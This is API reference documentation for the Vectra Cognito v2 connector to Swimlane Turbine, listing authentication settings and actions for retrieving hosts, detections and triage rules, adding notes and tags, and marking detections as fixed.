Vectra Cognito V2

vectra cognito v2 is a network detection and response platform that uses ai to detect and respond to cyber threats vectra cognito v2 is a leading network detection and response platform that uses ai to detect and respond to cyber threats in real time this connector enables seamless integration with swimlane turbine, allowing users to automate security operations by retrieving detailed host and detection information, adding notes and tags, and managing detections efficiently by leveraging this integration, security teams can enhance their threat management capabilities, streamline workflows, and improve response times to potential security incidents prerequisites before you can use the vectra cognito v2 connector for turbine, you'll need access to the vectra api this requires the following an api key authentication using the following parameters url the endpoint url for accessing the vectra api api token a token used to authenticate api requests and oauth2 authorization using the following parameters url the endpoint url for accessing the vectra api client id the client identifier for oauth2 authentication secret key the secret key associated with the client id token url the url to obtain the oauth2 token capabilities the vectra cognito connector provides the following capabilities add detection notes add host notes add tags get host by id get hosts get triage rule by id retrieve detections update detection configurations vectra cognito version 2 api key authentication authenticates using an api token configuration parameters parameter description type required url a url to the target host string required api token api token string required verify ssl verify ssl certificate boolean optional http proxy a proxy to route requests through string optional vectra cognito oauth2 client credentials authenticates using oauth2 client credentials grant with http basic auth against the vectra api v2 5 token endpoint configuration parameters parameter description type required url base url of the vectra portal (e g , https //\<vectra portal url>) string required token url full url to the oauth2 token endpoint (e g , https //\<vectra portal url>/api/v2 5/oauth2/token) string required client id the client id obtained when creating your api client (used as basic auth username) string required client secret the secret key obtained when creating your api client (used as basic auth password) string required verify ssl verify ssl certificate boolean optional http proxy a proxy to route requests through string optional actions add detection notes append notes to a specific detection identified by its detection id in vectra cognito v2 endpoint url /api/v2 5/detections/{{detection id}}/notes method post input argument name type required description path parameters detection id string required parameters for the add detection notes action note string optional parameter for add detection notes input example {"json body" {"note" "this is a detection note"}} output parameter type description status code number http status code of the response reason string response reason phrase id number unique identifier date created string output field date created date modified object output field date modified created by string output field created by modified by object output field modified by note string output field note output example {"status code" 200,"response headers" {"content length" "140","content type" "application/json","date" "mon, 15 apr 2024 20 37 23 gmt"},"reason" "ok","json body" {"id" 2,"date created" "2021 01 11t14 14 10 527603z","date modified"\ null,"created by" "vadmin","modified by"\ null,"note" "this is a detection note"}} add host notes append notes to a specified host within vectra cognito v2 using the host's unique identifier, requiring path parameters and json body endpoint url /api/v2 5/hosts/{{host id}}/notes method post input argument name type required description path parameters host id string required parameters for the add host notes action note string optional parameter for add host notes input example {"json body" {"note" "this is a note"}} output parameter type description status code number http status code of the response reason string response reason phrase id number unique identifier date created string output field date created date modified object output field date modified created by string output field created by modified by object output field modified by note string output field note output example {"status code" 200,"response headers" {"content length" "140","content type" "application/json","date" "mon, 15 apr 2024 20 37 23 gmt"},"reason" "ok","json body" {"id" 2,"date created" "2021 01 11t13 54 47 987918z","date modified"\ null,"created by" "vadmin","modified by"\ null,"note" "this is a note"}} add tags add a new tag to a specified host in vectra cognito v2 using the host's unique identifier endpoint url /api/v2 5/tagging/host/{{host id}} method patch input argument name type required description path parameters host id string required parameters for the add tags action tags array optional parameter for add tags input example {"json body" {"tags" \["test","new tag","this is a tag","we need to follow up on this host "]}} output parameter type description status code number http status code of the response reason string response reason phrase output example {"status code" 200,"response headers" {"content length" "140","content type" "application/json","date" "mon, 15 apr 2024 20 37 23 gmt"},"reason" "ok","json body" {}} get host by id retrieve detailed information for a specific host in vectra cognito v2 using the unique host id endpoint url /api/v2 5/hosts/{{id}} method get input argument name type required description path parameters id string required parameters for the get host by id action input example {"path parameters" {"id" 1}} output parameter type description status code number http status code of the response reason string response reason phrase id number unique identifier name string name of the resource active traffic boolean output field active traffic t score number score value c score number score value last source string output field last source previous ips array output field previous ips last detection timestamp string output field last detection timestamp key asset boolean output field key asset state string output field state targets key asset boolean output field targets key asset probable owner string output field probable owner detection set array output field detection set host artifact set array output field host artifact set host artifact set type string type of the resource host artifact set value string value for the parameter sensor object output field sensor tags array output field tags note string output field note note modified by string output field note modified by note modified timestamp string output field note modified timestamp notes array output field notes notes id number unique identifier output example {"status code" 200,"response headers" {"content type" "application/x www form urlencoded","date" "wed, 21 jun 2023 20 37 23 gmt"},"reason" "ok","json body" {"id" 1029,"name" "insightws07","active traffic"\ true,"t score" 90,"c score" 99,"last source" "10 16 6 6","previous ips" \["10 16 12 1","10 16 0 1"],"last detection timestamp" "2019 08 28t19 05 12z","key asset"\ false,"state" "active","targets key asset"\ true,"probable owner" "dkelle","detection set" \["https //10 1 6 10/api/v2 5/detections/1354 get hosts retrieve comprehensive information on all hosts from vectra cognito v2 endpoint url /api/v2 5/hosts method get input argument name type required description parameters fields string optional filters objects listed parameters page number optional page number possible values are a positive integer or last parameters page size number optional page size possible values are a positive integer up to 5000 parameters ordering string optional orders records by last timestamp, threat score and certainty score the default out sorts threat and certainty score in ascending order scores can be sorted in descending order by prepending the query with “minus” symbol parameters name string optional filter by name parameters state string optional filter by state active or inactive parameters last source string optional filter by last source (ip address) parameters t score number optional filter by threat score parameters t score gte number optional filter by threat score >= the score provided parameters c score number optional filter by certainty score parameters c score gte number optional filter by certainty score >= the score provided parameters last detection timestamp string optional filter by last detection timestamp parameters last detection timestamp gte string optional filter by last detection timestamp >= timestamp provided parameters last detection timestamp lte string optional filter by last detection timestamp <= timestamp provided parameters tags string optional filter by a tag or a comma separated list of tags (returns hosts that contain any of the tags specified), e g tags=baz tags=foo,bar" parameters key asset boolean optional filter by key asset true, false parameters min id number optional filter hosts have id greater than or equal to min id parameters max id number optional filter hosts have id less than or equal to max id parameters mac address string optional filter by mac address parameters note modified timestamp gte string optional filter by note modified timestamp >= the timestamp provided parameters privilege level number optional filter by exact privilege level of hosts 1 10 parameters privilege level gte number optional filter hosts that have a privilege level greater than or equal to the supplied number 1 10 parameters privilege category string optional filter hosts by privilege category options are ‘low’, ‘medium’ and ‘high’ input example {"parameters" {"fields" "string","page" 123,"page size" 123,"ordering" "string","name" "example name","state" "string","last source" "string","t score" 123,"t score gte" 123,"c score" 123,"c score gte" 123,"last detection timestamp" "string","last detection timestamp gte" "string","last detection timestamp lte" "string","tags" "string","key asset"\ true,"min id" 123,"max id" 123,"mac address" "string","note modified timestamp gte" "string","privilege level" 123,"privilege level gte" 123,"privilege category" "string"}} output parameter type description status code number http status code of the response reason string response reason phrase id number unique identifier name string name of the resource active traffic boolean output field active traffic t score number score value c score number score value last source string output field last source previous ips array output field previous ips last detection timestamp string output field last detection timestamp key asset boolean output field key asset state string output field state targets key asset boolean output field targets key asset probable owner string output field probable owner detection set array output field detection set host artifact set array output field host artifact set host artifact set type string type of the resource host artifact set value string value for the parameter sensor object output field sensor tags array output field tags note string output field note note modified by string output field note modified by note modified timestamp string output field note modified timestamp notes array output field notes notes id number unique identifier output example {"status code" 200,"response headers" {"content type" "application/x www form urlencoded","date" "wed, 21 jun 2023 20 37 23 gmt"},"reason" "ok","json body" {"id" 1029,"name" "insightws07","active traffic"\ true,"t score" 90,"c score" 99,"last source" "10 16 6 6","previous ips" \["10 16 12 1","10 16 0 1"],"last detection timestamp" "2019 08 28t19 05 12z","key asset"\ false,"state" "active","targets key asset"\ true,"probable owner" "dkelle","detection set" \["https //10 1 6 10/api/v2 5/detections/1354 get triage rule by id retrieve a specific triage rule from vectra cognito v2 using the unique identifier provided in the path parameters endpoint url /api/v2 5/rules/{{id}} method get input argument name type required description path parameters id string required parameters for the get triage rule by id action input example {"path parameters" {"id" "12345678 1234 1234 1234 123456789abc"}} output parameter type description status code number http status code of the response reason string response reason phrase id number unique identifier url string url endpoint for the request description string output field description enabled boolean output field enabled created timestamp string output field created timestamp last timestamp object output field last timestamp is whitelist boolean output field is whitelist priority object output field priority active detections number output field active detections total detections number output field total detections template boolean output field template additional conditions object output field additional conditions additional conditions or array output field additional conditions or additional conditions or and array output field additional conditions or and additional conditions or and any of object output field additional conditions or and any of additional conditions or and any of field string output field additional conditions or and any of field additional conditions or and any of values array value for the parameter additional conditions or and any of groups array output field additional conditions or and any of groups additional conditions or and any of label string output field additional conditions or and any of label source conditions object output field source conditions source conditions or array output field source conditions or source conditions or and array output field source conditions or and source conditions or and any of object output field source conditions or and any of output example {"status code" 200,"response headers" {"content length" "140","content type" "application/json","date" "mon, 15 apr 2024 20 37 23 gmt"},"reason" "ok","json body" {"id" 68,"url" "https //1 1 1 1/api/v2 5/rules/68","description" "expected behavior from these devices","enabled"\ true,"created timestamp" "2019 08 27t20 55 29z","last timestamp"\ null,"is whitelist"\ false,"priority"\ null,"active detections" 2,"total detections" 3,"template"\ true,"additional conditions" {"or" \[]},"source conditions" {"or retrieve detections gather all detection data from vectra cognito v2, providing a comprehensive overview of potential security threats endpoint url /api/v2 5/detections method get input argument name type required description parameters fields string optional filters objects listed parameters page number optional page number possible values are a positive integer or last parameters page size number optional page size possible values are a positive integer, up to 5000 parameters ordering string optional orders records by last timestamp, threat score and certainty score the default sorts threat and certainty score in ascending order scores can be sorted in descending order by prepending the query with “minus” symbol parameters min id number optional greater than or equal to(>=) the id provided parameters max id number optional less than or equal to(<=) the id provided parameters state string optional filter by state active, inactive, ignored, ignored for all parameters category string optional filter by the detection category this performs partial word match for example, you can use recon to query all reconnaissance category detections parameters detection type string optional filter by the name of the threat detected parameters detection category string optional filter by the detection category parameters src ip string optional filter by source (ip address) parameters t score number optional filter by threat score parameters t score gte number optional filter by threat score >= the score provided parameters threat score number optional filter by threat score parameters threat gte number optional filter by threat score >= the score provided parameters c score number optional filter by certainty score parameters c score gte number optional filter by certainty score >= the score provided parameters certainty number optional filter by certainty score parameters certainty gte number optional filter by certainty score >= the score provided parameters last timestamp gte string optional filter by last timestamp >= the date provided parameters last timestamp string optional filter by last timestamp parameters host id number optional filter by id of the host object a detection is attributed to parameters tags string optional filter by a tag or a comma separated list of tags parameters destination string optional filter by destination in the detection detail set parameters proto string optional filter by the protocol in the detection detail set input example {"parameters" {"fields" "string","page" 123,"page size" 123,"ordering" "string","min id" 123,"max id" 123,"state" "string","category" "string","detection type" "string","detection category" "string","src ip" "string","t score" 123,"t score gte" 123,"threat score" 123,"threat gte" 123,"c score" 123,"c score gte" 123,"certainty" 123,"certainty gte" 123,"last timestamp gte" "string","last timestamp" "string","host id" 123,"tags" "string","destination" "string","proto" "string","is targeting key asset"\ true,"note modified timestamp gte" "string","return as turbine schema"\ true,"alert organization" "string","ioc types" \["string"],"domains ignore list" "string","ip cidr ignore list" "string","regex ignore" "string","ioc ignore paths" \["string"]}} output parameter type description status code number http status code of the response reason string response reason phrase last timestamp string output field last timestamp grouped details array output field grouped details grouped details num sessions number output field grouped details num sessions grouped details protocol string output field grouped details protocol grouped details last timestamp string output field grouped details last timestamp grouped details host detection number output field grouped details host detection grouped details accounts array output field grouped details accounts grouped details is host detail boolean output field grouped details is host detail grouped details bytes received number output field grouped details bytes received grouped details dst geo object output field grouped details dst geo grouped details src ip string output field grouped details src ip grouped details dst ips array output field grouped details dst ips grouped details grouping field string output field grouped details grouping field grouped details description object output field grouped details description grouped details is account detail boolean output field grouped details is account detail grouped details dst ports array output field grouped details dst ports grouped details account detection object output field grouped details account detection grouped details first timestamp string output field grouped details first timestamp grouped details dst geo lat object output field grouped details dst geo lat grouped details dst geo lon object output field grouped details dst geo lon grouped details bytes sent number output field grouped details bytes sent grouped details target domains array output field grouped details target domains grouped details account uid object unique identifier output example {"status code" 200,"response headers" {"content length" "140","content type" "application/json","date" "mon, 15 apr 2024 20 37 23 gmt"},"reason" "ok","json body" {"last timestamp" "2019 08 27t20 13 08z","grouped details" \[{}],"custom detection"\ null,"is custom model"\ false,"detection" "hidden http tunnel","detection type" "hidden http tunnel","is targeting key asset"\ false,"note modified timestamp" "2021 12 15t17 26 41z","c score" 59,"t score" 10,"id" 36,"category" "command & control","src ip" " search detections search detections using vectra's lucene style query language against the v2 5 search endpoint, supporting pagination and optional normalization to turbine schema alerts endpoint url /api/v2 5/search/detections method get input argument name type required description parameters query string string required lucene style search query for detections examples 'detection is triaged \ false and detection grouped details dst ports 445 ', 'detection grouped details target domains \ snakeoil biz', 'detection last timestamp \[now 1d to now] and (detection is triaged \ false )' parameters page size number optional number of results returned per page default is 50 maximum is 5000 parameters return as turbine schema boolean optional if true, returns results as normalized turbine schema alerts instead of raw api response parameters alert organization string optional optional organization name to include in the turbine schema alert used only when return as turbine schema is true parameters ioc types array optional list of observable types to extract supported ipv4 public, ipv4 private, ipv6 public, ipv6 private, domain, url, email, sha1, sha256, md5 if omitted or empty, all types are extracted parameters domains ignore list string optional comma separated domain values to exclude from observable extraction parameters ip cidr ignore list string optional comma separated cidr ranges to exclude from observable extraction parameters regex ignore string optional regex pattern — any observable value matching this pattern is excluded parameters ioc ignore paths array optional array of slash separated field paths to strip from each alert before extracting observables supports wildcards ( ) and nested paths example \["processcommandline", "context/ /ipaddress"] input example {"parameters" {"query string" "string","page size" 50,"return as turbine schema"\ true,"alert organization" "string","ioc types" \["string"],"domains ignore list" "string","ip cidr ignore list" "string","regex ignore" "string","ioc ignore paths" \["string"]}} output parameter type description status code number http status code of the response reason string response reason phrase count number total number of matching detections next string url of the next results page, or null if on the last page previous string url of the previous results page, or null if on the first page results array array of raw detection objects returned by the search results last timestamp string result of the operation results grouped details array result of the operation results grouped details num sessions number result of the operation results grouped details protocol string result of the operation results grouped details last timestamp string result of the operation results grouped details host detection number result of the operation results grouped details accounts array result of the operation results grouped details is host detail boolean result of the operation results grouped details bytes received number result of the operation results grouped details dst geo object result of the operation results grouped details src ip string result of the operation results grouped details dst ips array result of the operation results grouped details grouping field string result of the operation results grouped details description object result of the operation results grouped details is account detail boolean result of the operation results grouped details dst ports array result of the operation results grouped details account detection object result of the operation results grouped details first timestamp string result of the operation results grouped details dst geo lat object result of the operation output example {"status code" 200,"response headers" {"content type" "application/json"},"reason" "ok","json body" {"count" 1,"next"\ null,"previous"\ null,"results" \[{}]}} update detection mark or unmark multiple detections as fixed in vectra cognito v2 using the provided json body endpoint url /api/v2 5/detections method patch input argument name type required description detectionidlist array optional unique identifier mark as fixed string optional parameter for update detection input example {"detectionidlist" \[123],"mark as fixed" "string"} output parameter type description status code number http status code of the response reason string response reason phrase output example {"status code" 200,"response headers" {"content length" "140","content type" "application/json","date" "mon, 15 apr 2024 20 37 23 gmt"},"reason" "ok","json body" {}} response headers header description example content length the length of the response body in bytes 140 content type the media type of the resource application/json date the date and time at which the message was originated mon, 15 apr 2024 20 37 23 gmt